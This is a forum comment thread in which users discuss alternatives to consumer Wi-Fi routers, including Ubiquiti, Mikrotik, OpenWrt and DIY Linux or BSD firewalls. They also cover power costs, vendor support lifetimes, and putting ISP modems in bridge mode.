Seems like it would make a quiet and fast 6 port x 2.5 Gbit router and run well with Linux based OS, unsure of the state of drivers for *bsd.
I did see a thread about getting it to work well with OpenWRT.
Ok I get it.... any recommendations for acceptable routers?
When this article says "router" it means "combination router and wireless access point". Which is fine—that's how most people think of these products—but they are available separately.
For my home, using Ubiquiti products has worked well. I have the EdgeRouter Lite and UAP-AC-PRO access points which support POE. It's been nice using products designed for professionals, and it's nice to be able to administer and upgrade the router independently from the access point. These products just work, and there's none of this dodgy "reboot the router" nonsense.
I hear a lot of good things about the many mesh networking setups (often combined routers/APs) now on the market but haven't tried any. They're almost certainly a better fit for a consumer who doesn't want to be a network admin. Ubiquiti has one (the "Alien"), and the Eero (now owned by Amazon) is often recommended.
I recently rebuilt my home network when switching ISPs and fell in love with Ubiquity. It's the first time I have ever been happy to use networking-related hardware. Dealing with Asus/Linksys/Netgear/etc in the past had always been a miserable experience, and I'd cringe every time my internet went out and was forced to deal with them again.
It's a shame that there aren't more "pro-sumer" products like this out there. A common warning I read when researching Ubiquity products was that they're not for people who aren't tech/networking professionals. I don't know where that came from, because setting it all up was a breeze. It was way easier than dealing with Asus's terrible "setup wizard".
>"It's a shame that there aren't more "pro-sumer" products like this out there"
Mikrotik is another company that has a good pro-sumer to pro ecosystem. Routers, APs, adapters, long-range point-to-point radio stuff. Most of their gear runs on variations of their RouterBOARD hardware and Linux-based RouterOS, and can be collectively managed through CAPsMAN, which can either run on one of their routers or on a desktop PC.
The configuration side is definitely less slick than what you get with Unifi, on the other hand you can configure everything in detail. You get an astounding amount of possibilities for your money, if you can accept the late-90s/early-2000s style web interface or just use the terminal interface instead.
The only thing I've found lacking is that they don't have any 4x4 or 802.11ax access points yet, but if you go modular (separate router, switch and AP), you can upgrade piecemeal when you need to.
> A common warning I read when researching Ubiquity products was that they're not for people who aren't tech/networking professionals.
There's still a lot of weirdness in Ubiquiti, even in their UniFi line, that'll throw the average user, but it's definitely a lot more user friendly than the EdgeMax line. I often find UniFi tries to be so friendly that it ends up making things harder. I had an auto-discovery issue that I spent a lot of time troubleshooting, mostly because I can't just tell it "this device with this MAC address is here now", it has to find it for itself.
The UDMP does a really good job just being "the central core of your network you plug stuff into", but it's also confusing because it has the device firmware itself and then the software for each function on it, including the firewall software, which is all very convoluted.
I have an EdgeRouter ER-8 (acquired secondhand; I do not need 8 router ports for my home network) and have been considering upgrading to an EdgeRouter ER-4 (fewer ports; much better throughput) because the ER-8 is actually a bottleneck on my 600Mbps cable uplink. The ER Lite is even worse and doesn't seem to be well suited to modern Internet speeds.
The EdgeRouter OS is essentially a Debian build and can run openconnect and other VPN software if you need something that is not included in the base install.
I would recommend the ERs to anyone with a bit of networking skill.
> The ER Lite is even worse and doesn't seem to be well suited to modern Internet speeds.
What are you doing to it? Mine ran at 950 down, 450 up just fine. Are you going faster?
I've got a UniFi Dream Machine Pro and a UAP-AC-PRO, and it's everything I could ever need or want in a home network. I had an EdgeRouter X before the UDM Pro, which was also very nice but definitely lacked a lot polish and also just couldn't provide the full speed of my Internet connection (600mbps).
My parents have Eero, and it's definitely a really nice system that Just Works. Exactly as you described it, perfect for a consumer that wants quality without having to be a network admin.
The author of the article has some suggestions here:
https://www.michaelhorowitz.com/second.router.for.wfh.php
and here:
Many of the items on the checklist are questionable. eg.
>Can the wireless network(s) be scheduled to turn off at night and then back on in the morning?
This seems almost tin-foil hat level security. Nobody is wardriving at 3am and hacking into your wifi.
>Is it limited to one logon at a time? It should be. The router should not allow multiple computers to logon at the same time using the same userid.
How does this improve security? I guess you can use it to catch an attacker on the rare chance that they get access at the same time you're on the admin page, but that's not really worth considering.
>Can the userid for the web interface be changed? Every router lets you change the password, a few let you also change the userid. This is most important when using Remote Administration. An October 2016 study of 12,000 home routers by ESET found that "admin" was the userid "in most cases."
What's wrong with "admin" with a secure password?
I work on a product that allows "one user at a time". It's not a security issue, it's a "don't want to maintain a multi-user database for extremely small benefit" issue. There's no good reason to have multiple folks futzing with this thing's configuration, just like there's no good reason to have multiple folks futzing on your router. Most of the time my product or your router sits in an out-of-the-way place gathering dust, multi-user access is a laughably infrequent use case.
Now why the author calls this out is anyone's guess. Sometimes someone sees a product like what I work on, sees single-user, assumes "aha! Better security!" No, we're just lazy. If there's any additional security, that's gravy and not a design decision.
I agree that the author seems over the top.
I do think "one logon at a time" might be a good idea, just not for security reasons. I suspect these routers don't do well with concurrent updates.
Changing the admin id would have the benefit of culling out noise. An unsuccessful login attempt to "myuniqueadmin" catches your attention as something meaningful.
These three are recommended in the security checklist [0]
[0] https://routersecurity.org/checklist.php* Pepwave Surf SOHO * Amped Wireless RTA1750 * Synology RT1900acSlap Linux on an old desktop, buy a 4 port PCI NIC, setup nftables/dnsmasq, and as a bonus become addicted to self hosting.
That replaces a 5-10W device with a 100W device. I wouldn't want that, that's 566kg of extra CO2 per year with the US power mix.
I think you can swap "old desktop" for some smaller new power efficient mini desktop, which at idle (for basic home needs lets face it it's pretty close to idle) it's likely to draw way under it's max... but if you are so carbon conscious consider the total environmental cost, buying new shit (new mini desktop or consumer routers) that constantly needs replacing incurs a carbon cost through consumption that people rarely try to quantify because it's not so easy - but it's often still very big. Saving an old PC from the rubbish is free of this cost, it not only saves manufacturing carbon cost but environmental pollution.
On Ebay you can find Dell R210 ii with Ivy Bridge CPU for 150 USD. These idles at 25watt, and are super quiet and small. I have not tested the R220 with Haswell, but I guess idle watt usage is less than 20watt as Haswell had much improved power efficiency when idling.
1 Watt continuous is $1 per year, as a typical USA rule of thumb (at $0.12 per kWh). Places like California are a lot more expensive.
So yeah, it's pretty expensive on an ongoing basis to convert an old desktop to a router.
I must confess, I run an OpenBSD firewall on an old Dell server. Fortunately the Intel CPU doesn't need to do much. So I'm only drawing about 70 W continuous. I keep meaning to replace it with something more power efficient but haven't.
I've had good success with Ubiquity edgerouters
I started thinking this route. 12 months and $2000 later I ended up with a 15U rack in my basement, Ethernet drops in most of my rooms, wifi that blankets my home and yard, 4K security cameras, and more. Contrary to what you might read from a vocal minority on Reddit, my UDM-PRO has been solid. It was a great investment for the work from home era.
Not saying it wasn’t worth it - it’s a huge step up in reliability from what I had, but I kinda feel like an EdgeRouter is a gateway into the wider Ubiquiti ecosystem.
I currently have Ubiquiti gear, bought about five years ago, and my APs are already EOL for a couple of years. They don't seem like a great choice for medium-term or long-term installations for this reason. They also don't seem to publish EOL or support timelines, or commit to supporting equipment for any term (as far as I can find - I'd love to see a support schedule if anyone know it).
On the flip side, the UAP-AC-PRO access point that I bought 5+ years ago is still supported and receiving updates to this day. And that's the case for the majority of their access points.
Glancing at their documentation, it seems that they've only EOLed the three early 802.11ac access points they released. Of course that doesn't help you or make your concern any less valid, but it's not like they're in the business of just willy-nilly cutting off support for their products. The one you bought just happened to fall into an unfortunate minority.
I agree, but they don't seem to release any information about how long a product will be supported. I could upgrade today and find the product EOL'd tomorrow.
Yep, that's definitely a valid criticism.
PCEngines APU for DIY, or Mikrotik for a provided solution. If you need more ports or throughput, extend with a dedicated switch. Any stupid unmanaged switch is good enough for most SOHO use-cases, unless you want to get serious with segmenting your network with VLANs and ACLs.
As for what DIY OS/dist, I have used VyOS, IPFire, pfSense, OPNSense, and a handful of various xx-WRT derivatives. OpenWrt is still my recommendation without a doubt. I'm still not at all a fan of the update and package management of OpenWRT, but it's the best out there unless you configure a vanilla debian install yourself.
Keep WiFi APs as separate devices, regardless of if you mesh or not.
For fun, I'd make my own with a low-power Linux/BSD box (Atom or ARM-based). I guess performance would be totally acceptable comparing to consumer-grade routers (do we need ASIC-based routing at home anyway?)
For the full consumer router experience you should run it inside qemu-system-mips. Then it should also match up performance wise.
Of course it wouldn't be complete without hacking up your own, custom Linux system calls[1], or hacking up SquashFS to be big-endian for no reason and storing your own data structures in the compressor options[2].
[1] https://twitter.com/RichFelker/status/1357733309737021444
Turris?
You can also use this as plausible deniability when you get raided by the police and they discover your collection of pirated music.
Another postive note here for Mikrotik - $50 USD buys you the hAP ac lite - enough for a "home" router but with all the features of top end enterprise routers.
Other comments have addressed security concerns - there's lots of CVE's out there because there's lots of Mikrotiks out there. As far as I'm aware, all or nearly all CVE's are patched before they are public; there's always the risk of zerodays but everything has the risk of zerodays.
I would go for the hAP AC or AC2, rather than the lite versions, which are specifically the low end of the range and can only route ~500Mbps and don't have 5GHz wireless.
The difference in price isn't even that much, the AC2 is less than $70.
This is good advice for a "one device does it all" setup.
My personal setup is actually running the hap AC lites as access points, via CAPsMAN. I do routing on a hex Gr3. The hap ac lites are great value for a dual-radio 2.4/5ghz ap.
I also have an all-mikrotik passive poe setup, so it's one lead to the ac lites. Similar featureset to ubnt, cisco, others, at a fraction of the price.
The state of all network firewalls/routers is appalling. Even high end Cisco, Fortinet, or even Palo Alto gear is riddled with security issues, critically outdated packages, and general poor maintenance.
IMO, the only way to have a reasonably secure device is to build it yourself. That's not going to be a popular opinion where the prevailing motto is "nobody gets fired for buying Cisco", but I don't really see any alternative. OpenWRT/Tomato are decent, but they still expose a web UI which is potentially a greater attack surface than ssh w/ public keys.
I've seen some people have good results with OpenBSD or FreeBSD, others with skinny versions of Debian or CentOS. I took a crack at it last year on Debian (shameless plug: https://nbailey.ca/post/linux-firewall-ids/), and I've been happy with it so far. It is more expensive to build, but I expect this device to last more than a decade, or until I need greater than 1gbps per port.
Just uninstall the openWrt web UI then.
or configure uhttpd to only listen on localhost and use a ssh proxy tunnel to access the web interface. It saves you from the hassle of self signed certs too.l
Well, if you build it yourself at least you’ll think it’s secure!
About a year ago I decided no more crappy plastic boxes as my main home router, and now use a headless Linux PC instead. No regrets and have plenty of resources to run things like ntopng and anything I need right at the edge of my home network; and QoS is something I can control as well.
I don't care about the small increase in cost of electricity where I'm at.
Now I do also have an Asus RT-AC56U but configured for an access point only. Which had pretty decent firmware IMHO with it's OpenWRT variant "AsusWRT"--decent because it's easy to get root without flashing it and really do what you want. With all the cloud service stuff disabled, it goes into a 2nd NIC into my PC-as-a-router and is appropriately firewalled.
At least one other comment talks about getting business class hardware for Wifi and that might be a plan in the near future, but for now it's working OK for me.
Agree as OpenWrt user.
> "Linksys is by no means alone in using its customers as beta testers
No sure, but my Linksys router starts painfully slow and kinda 10x faster on OpenWrt. Crazy slow for dual-core machine. Maybe it's the part of their plans to force clients for buying new routers?
If I disable wifi on the shitty router my ISP gave me, and assuming the physical device is secure, am I safe from having my home network hacked into?
I assume the ISP could still backdoor their way in (is this likely?) but that is a separate concern.
This depends completely on what you put AFTER the router that your ISP gave you. You can often get your ISP to put the router into Gateway mode which turns off the routing part and the wifi. It becomes just a modem at that point, and you can use whatever good router you want.
Yes some are really atrocious, dlink come to mind. Some are better, the high end gaming routers by Asus actually have good support but just like phones they have a limited shelf life...
One thing I tried to find but couldn't is stand alone modems, most routers today don't come with a modem and you have to use the shitty one given to you by your ISP in bridge mode, I'm not sure about the risk of compromised bridge mode router to infect down to the router given it's "secured" but it's still can be a bot in a botnet.
Okay cool but....
I'm still just plugging these supposedly awesome routers into bargain bin, un-updated, garbage quality, broken, insecure, spying cable modems provided by or "compatible with/verified for" my internet service.
So what if my router is secured? My connection is still beholden to whatever garbage software written in 2008 my damn DOCSIS 3.0 compliant box has, with all the unfixed bugs and performance issues that entails.
Are there any cable modem/routers that can be customized? Have openWRT or similar installed? Or are otherwise pretty good?
Wait until you hear where the bytes go when they leave your house...
Assume the physical network is insecure. The only exceptions might be secure backplane networks carefully configured and isolated, but these are basically data busses for clustered computing.
I was in the market for a home router a couple of months ago and I was astonished that 200-300 euro is now considered "mid-range" for a wireless router.
That's the gamer tax in effect. Sci-fi looking hardware with wild claims about bandwidth and latency for ultimate gaming performance lets them charge a premium.
I can't tell - is that more or less than you expected?
My favorite solution is a thin-client class computer with opnSense, and a Ubiquiti Wifi Access Point.
I have used a Ubiquiti router, but find opnSense easier to use.
I got an Arris SURFboard SBG7600AC2 a couple of months before the pandemic hit. Don't know about the security but the device itself has been rock-solid. Here I am 14 months later without any complaints. Four people are working remotely on it, numerous mobile devices are connected and some are streaming - it's never broken a sweat.
If anyone knows of a security issue I'd love to hear about it.
I like the Juniper SRX series, BSD-based and find the configuration syntax (mostly) very logical. But, no WiFi (I use Ubiquiti for that).
very solid aswell.
mind you even a basic srx is complete overkill for a home environment. it is very solid hardware with good support. I would however, not recommend getting one for home use unless your employer runs juniper and can get you the update packages, getting them without a license is difficult.
I have recently bought a Mikrotik RB4011 for my home. It was a bit pricey, but I love the feeling of control I got when I set it up. The model with built-in WiFi had very poor coverage, so I exchanged with it for a model without wifi as that one can he mounted into a rack, and now I will se my old consumer router in bridge mode as an access point.
the recommended pepwave surf soho has mult-wan support, including wifi and cellular, which is one of the reasons i went with it (along with robust vlan support). i've yet to find a way to bridge/route everything i want from my main vlan to my iot vlan while isolating everything else appropriately.
unfortunately, mine has intermittent radio timeout issues (or something more obscure that i can't diagnose, like frequency-hopping induced congestion), where i have to log into the router and force a rescan of the airwaves for it to reestablish connection to the upstream wan wifi. it's also lately having issues with the 2.4Ghz network dropping out (i may eventually dig up my old wrt54-gl with tomato on it to run the 2.4Ghz separately).
I have a NanoPi R2S with OpenWrt for almost one year. It's a ARM device so uses very litter power. One of its two gigabits ports is converted from USB3. Works well with 500Mbps downlink. There is a newer mode (R4S) with a PCIe converted gigabits port.
Consumer electronics are pretty much all bad. Usually the software devices are shipped with is poorly designed at best (it needs to look nice to sell, ergonomics don't matter) and pathologically user hostile at worst (smartphones and PCs.)
Does the AmpliFi fit into this category? I got an Instant a while back and while it's not super tweakable, it's been incredibly stable and easy to use.
How exactly would I go about avoiding consumer routers when every provider in my area forces me to get some kind of modem with built in router and wifi?
You can treat the ISP's router as bare, hostile internet and put the router of choice behind it. Disable their WIFI if you can, but don't use it. Plug an ethernet cable from your router's WAN port to one of the ISP router's LAN ports. Your router's WAN side will get one DHCP address from the ISP's router. Your LAN side and firewall rules are however you like them, on your router. This whole thing is called "double NAT-ing" -- search for that term for a how to guide.
A lot of ISP routers have the option to disable everything except the modem, often called "bridge mode". Avoids double NAT.
You can also call your ISP to put the modem-router in bridge mode. This will basically turn off all of its features and just have it pipe internet access from its LAN ports. If you do this, remember to go ISP router LAN port > personal router WAN port, as you won't be protected by the ISP router firewall anymore.
Good suggestions. Thank you. I have done something similar before. Only problem is, I had to revert the setup each time isp had hiccups otherwise they refused to provide any support
I haven't done any research, but my set of anecdata (3 Internet providers from Romania, 2 national and one regional) says that providers do have ways of bypassing their router at Layer3. These ways are not advertised, sometimes not even documented. But they should be just a phone-call away.
If the router is also used as a media-convertor (upstream is Fiber or DSL or coax), they should be able to set it to "bridging mode", where it will function as a Layer2 device (switch), thus allowing the customer to use their own Layer3 device (router).
Most of the times you can set them to bridging mode from the management interface as well.
How exactly would I go about avoiding consumer routers when every provider in my area forces me to get some kind of modem with built in router and wifi?
It is a ridiculous situation, but I actually have our provider-provided router connected straight into a real firewall, and that in turn connected to a switch which in turn has the wifi base stations connected to it.
This means that if the first router is compromised there is a chance it won't penetrate the household, but of course the first router could still be used e.g. as part of a botnet by an attacker.
OpenBSD on a PC Engines APU2 is a good choice for those that would like to enjoy setting up a firewall with PF on low power consuming hardware.
Used to be easier in the DSL days. Hardware was easy to find. Then my ISP switched to VDSL and it became almost impossible to find better routers. Now I have a fiber link and the ISP's router is so bad but I don't really know if I can just buy a better one and connect the fiber to it. I've been told ISPs have remote access to the router and can update it remotely and deny access if it's been tampered with.
It's probably a wise decision to avoid consumer products in general but it's becoming harder every year.
Does your ISP router have DMZ hosting, where you can forward all packets at layer 2 or 3 to your own router behind it?
What would be the advantage of that? Unless you "own router" is basically VPNing everything past the ISP router? In which case it's not really clear why you need the "own router" part...
There are plenty of VDSL modems which can be interfaced with a router of your choice.
I couldn't find any years ago. Perhaps the situation has improved by now.
I wish there were cable modems available as PCIe expansion cards with OSS drivers so I could roll all my own home networking gear.
Every critique in this list could be levelled at networking equipment that costs thousands or tens of thousands of dollars.
Curious why nobody mentioned Turris series - they provide consumer routers with OpenWRT, and with upgrades.
Apple, you are missed in this space.
Avoid consumer laptops too
He's gonna have to pry my Fritz!Box from my cold dead hands.
What's the tl;dr?
Buy any router, but replace its software with dd-wrt or openwrt?
Not exactly. It's worth the read, it's about 7 min. :)
I like this little thing: https://shop.netgate.com/products/1100-pfsense
Nice little pfsense box.